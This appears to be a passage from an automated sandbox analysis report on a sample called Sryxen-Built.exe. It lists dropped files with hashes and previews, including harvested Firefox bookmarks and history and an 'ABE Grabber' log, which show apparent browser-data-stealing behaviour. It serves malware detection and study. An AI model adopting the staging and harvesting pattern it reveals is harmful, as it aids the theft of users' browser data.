                                                                                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\NI5B49f.db-shm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\NTtqcw9.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):139264
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1366509594298093
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                                                                                                                                                                                                                                MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                                                                                                                                                                                                                                SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                                                                                                                                                                                                                                SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                                                                                                                                                                                                                                SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\OyLTXQq.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8616778647394084
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                MD5:BDDE4AD11E732420E7ABCCA946B11611
                                                                                                                                                                                                                                                                                                SHA1:278C3386A37BAFCA507CF4C128600B01B312DDA0
                                                                                                                                                                                                                                                                                                SHA-256:099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
                                                                                                                                                                                                                                                                                                SHA-512:B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Sryxen\bookmarks.txt

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):667
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.303367738707352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:RO493sMwNtnJF73O493szwvaacAhZmKXotnMLNO7ltnZsNO7Fftn7RE2qO7iLJ2d:RLxsM0n7LxsaROuCf2CTVEPCCQEmZ
                                                                                                                                                                                                                                                                                                MD5:B50A39AF5DE28553458D769F47B3D7FD
                                                                                                                                                                                                                                                                                                SHA1:21D247C540B604E262106940EC3C1635F957A89D
                                                                                                                                                                                                                                                                                                SHA-256:360D8AB93CE78281BB2F9D68FFD8E3C4FFDE9E266B8C559D5062C06F56377973
                                                                                                                                                                                                                                                                                                SHA-512:D317EA89B39C2014839787A676818F35A5CDE92A12810453B0AC242531815B65ACF47D91ACF1AD12AE2FB5F2EBCFEC7388BA52F3BF3A2F6A7F6F36D18CCB54D9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[Bookmark] Get Help -> https://support.mozilla.org/products/firefox (Added: 1696333827462000).[Bookmark] Customize Firefox -> https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize (Added: 1696333827462000).[Bookmark] Get Involved -> https://www.mozilla.org/contribute/ (Added: 1696333827462000).[Bookmark] About Us -> https://www.mozilla.org/about/ (Added: 1696333827462000).[Bookmark] Getting Started -> https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaign=new-users&utm_content=-global (Added: 1696333827537000).

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Sryxen\console_log.txt

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.716435715420624
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:WZ3IyF2PwTaMzjDeNGN8cXKIOBFReDRFbAjB9MJMomgKIOBFReDRF3mJHkm4qZ3I:s1F2PgzjGGN830RMwJIh0RZuL1Fzbw
                                                                                                                                                                                                                                                                                                MD5:4F97B8B2016DB34273D42C80B0A94B22
                                                                                                                                                                                                                                                                                                SHA1:BD9861DA661693FAD783E1E8047CED9943E61E16
                                                                                                                                                                                                                                                                                                SHA-256:75477F2FAB2D295A12153A810924064C4F525B78B17F60F811EEE98287429C1D
                                                                                                                                                                                                                                                                                                SHA-512:DFBE08E2FDB441EE354EC4024C4E800A87C9316035A7E34396F7315E1FEA3417B6B173347B79F9A2EF91773CD7A736D1791977F0B87119E8876EE3BA29F32275
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[INFO] ABE Grabber Started..[INFO] Test file created successfully...[ERROR] Failed to get process details...[ERROR] Failed to get module base address...[INFO] ABE Grabber Finished..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Sryxen\edge_abe.txt

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):59
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.911724193172954
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:48LA3OnXkGXbQRQU4wv:48LGO5XbQ2Ha
                                                                                                                                                                                                                                                                                                MD5:CAA85EE4984D022A3500F6C6CC00E98D
                                                                                                                                                                                                                                                                                                SHA1:843CE2B00D9D3D88012618EE626987E4D136E7CF
                                                                                                                                                                                                                                                                                                SHA-256:F8C4A560CA33EC41ED79C15278CE1C8D9659F11527D1EEF0AA4E9C0791F7A3B5
                                                                                                                                                                                                                                                                                                SHA-512:A4A751FD912824DDC1F193F3474CA78967EDB6C249C833E28F9DFD36F0E6001026F4AEEA6000C69FE3DE3E1949E356917D71D6C6AED0BD5D0412E84468E3C35A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:user-PC\user....[*] Browser Version: 117.0.2045.18352....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Sryxen\history.txt

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):149
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.146925649869725
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:OMFQWiGPHA9lfMJJEFOpfFDROrSLvIJiMhKVX3L2Wde3MLRLZFpswTCiF:OQiG/CF0EFIuGLciA8deeZFoiF
                                                                                                                                                                                                                                                                                                MD5:BCAED25507F56AF5AAB87979FA0EDACB
                                                                                                                                                                                                                                                                                                SHA1:98848D5B2090A5442F62DF3F8CE0D8C570424E8A
                                                                                                                                                                                                                                                                                                SHA-256:87ECE6D3E188F4FEB08BFF18BEFB0CDDB482733FB0138AB425D2D9E1F2F38C95
                                                                                                                                                                                                                                                                                                SHA-512:0787119663610BF4C9738080916AE0C2484A97BD228DFCE5C6B9455A760C3119C6687F6C9A29077F4B4D9C02DE907F5FF023820EF3EC99A3E58F8224A7D42914
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[History] Title: Firefox Privacy Notice . Mozilla | URL: https://www.mozilla.org/en-US/privacy/firefox/ | Visits: 1 | Last Visit: 1696333827687000.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Z3frOnv.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):27529
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.988354944072016
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:Oko0oxQmZeyY007dvmqrEmcuDR++uRFFi:G0GZ2dvmqrHcu9Sg
                                                                                                                                                                                                                                                                                                MD5:86A297E41670F669E8541F312BC46C05
                                                                                                                                                                                                                                                                                                SHA1:3CAE2EF2244D110A3F748E3A2297362F157A5907
                                                                                                                                                                                                                                                                                                SHA-256:57D14CFFBFBE4F63B032A7FC0909AC5E721DF119862716CFC157B25A0E98A397
                                                                                                                                                                                                                                                                                                SHA-512:D7DF336D67CB21DC7DAAAC62C780EA271A0D78B3DB2C401977978F3C487CBCF709D8BE2F676D5665DD68831D876BE5CB0E321CE7B6F5587E7D51DE19A3F91E46
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"accessibility":{"captions":{"soda_registered_language_packs":["en-US"]}},"autofill":{"ablation_seed":"wh6o5X1WNI4="},"breadcrumbs":{"enabled":false,"enabled_time":"13385816888405751"},"browser":{"first_run_finished":true,"last_whats_new_version":134,"shortcut_migration_version":"117.0.5938.132","whats_new":{"enabled_order":["ToolbarPinning","PerformanceInterventionUI","PdfSearchify"]}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.741343581414886e+12,"network":1.74134361e+12,"ticks":46187181.0,"uncertainty":2251174.0}},"optimization_guide":{"model_cache_key_mapping":{"13E6DC4029A1E4B4C1":"4F40902F3B6AE19A","15E6DC4029A1E4B4C1":"4F40902F3B6AE19A","20E6DC4029A1E4B4C1":"4F40902F3B6AE19A","24E6DC4029A1E4B4C1":"E6DC4029A1E4B4C1","25E6DC4029A1E4B4C1":"4F4

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgysmquf.dax.psm1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxlmsv11.hih.ps1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m03e4hzr.fcc.psm1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyxwn5ks.a0z.ps1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b5QYFAo.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b84a2de6-1423-41b4-b30c-85f0647f6be8.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):353
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.389563032015748
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:YEZb7WJ56s/uplbB1MvRL56s/upgSUzUpQJjDrwv/C:Y+XWJ56s/0lbnMJ56s/0IUp0Dkv/C
                                                                                                                                                                                                                                                                                                MD5:8CAE9D6BC3B55D8E6F8AAF85E436C735
                                                                                                                                                                                                                                                                                                SHA1:44095D41AC2429938B34051679E845D546F311F5
                                                                                                                                                                                                                                                                                                SHA-256:830B908A4D14E577FE5D4D3415E8F40D9BB8AAACEBCECA43F98C4015067471DE
                                                                                                                                                                                                                                                                                                SHA-512:FC285236D6DE3ED25A83652384EBF8634BC6397A62B698BD7EC2AE50FD8DD8D88D6E71038325EE8F56BB675BE5142BA7B4C92BFA1BE84B68244BF0F1A3E11931
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"logTime": "0308/234339", "correlationVector":"q0vVLI0JCRQBv0Xhknx8DQ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0308/234340", "correlationVector":"yv7XQd//8x5WTzIqfn6dtU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0308/234340", "correlationVector":"9E00E1B1A1AE411292CFB7098177D3A5","action":"FETCH_UX_CONFIG", "result":""}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\db882602-a6ad-40dc-b6ac-1a1b552aa719.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41902
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):76319
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.996132588300074
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6w6DLZ8:GdS8scZNzFrMa4M+lK5/nEDd8
                                                                                                                                                                                                                                                                                                MD5:24439F0E82F6A60E541FB2697F02043F
                                                                                                                                                                                                                                                                                                SHA1:E3FAA84B0ED8CDD2268D53A0ECC6F3134D5EBD8F
                                                                                                                                                                                                                                                                                                SHA-256:B24DD5C374F8BB381A48605D183B6590245EE802C65F643632A3BE9BB1F313C5
                                                                                                                                                                                                                                                                                                SHA-512:8FD794657A9F80FDBC2350DC26A2C82DFD82266B934A4472B3319FDB870841C832137D4F5CE41D518859B8B1DA63031C6B7E750D301F87D6ECA45B958B147FCD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\e050f4f7-7e41-4f91-b987-586e7194dc88.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ff648daf-ad38-4f2c-8c86-aff4c9610f97.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1367145
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9928758186534585
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:24576:wd7/iCrQhVojm2kJ0VbU5rsbULblbnaKkaGpPqOdLShg+8Gid0O:cZrw9x+VINflbnphGVcghF0O
                                                                                                                                                                                                                                                                                                MD5:68E5394C7BB9B6661C44633A6CBD7F6F
                                                                                                                                                                                                                                                                                                SHA1:AF621C1C3BC44D0D6940C89D8B829D4A6AA1AE5A
                                                                                                                                                                                                                                                                                                SHA-256:DEAB28E43C752CF33B470E9F22E3BBEC05197EF1A4A517BE6DEE205F83DA2815
                                                                                                                                                                                                                                                                                                SHA-512:C4B5671500497D862C09BF2F3DAC52561D110DED6B95C1B6A6F2FCA2B877A33A6E994ED828003C575D9922640D8DD6F441E16B7EA1EDE2743B31D266DE37249C
                                                                                                                                                                                                                                                                                                Malicious:false
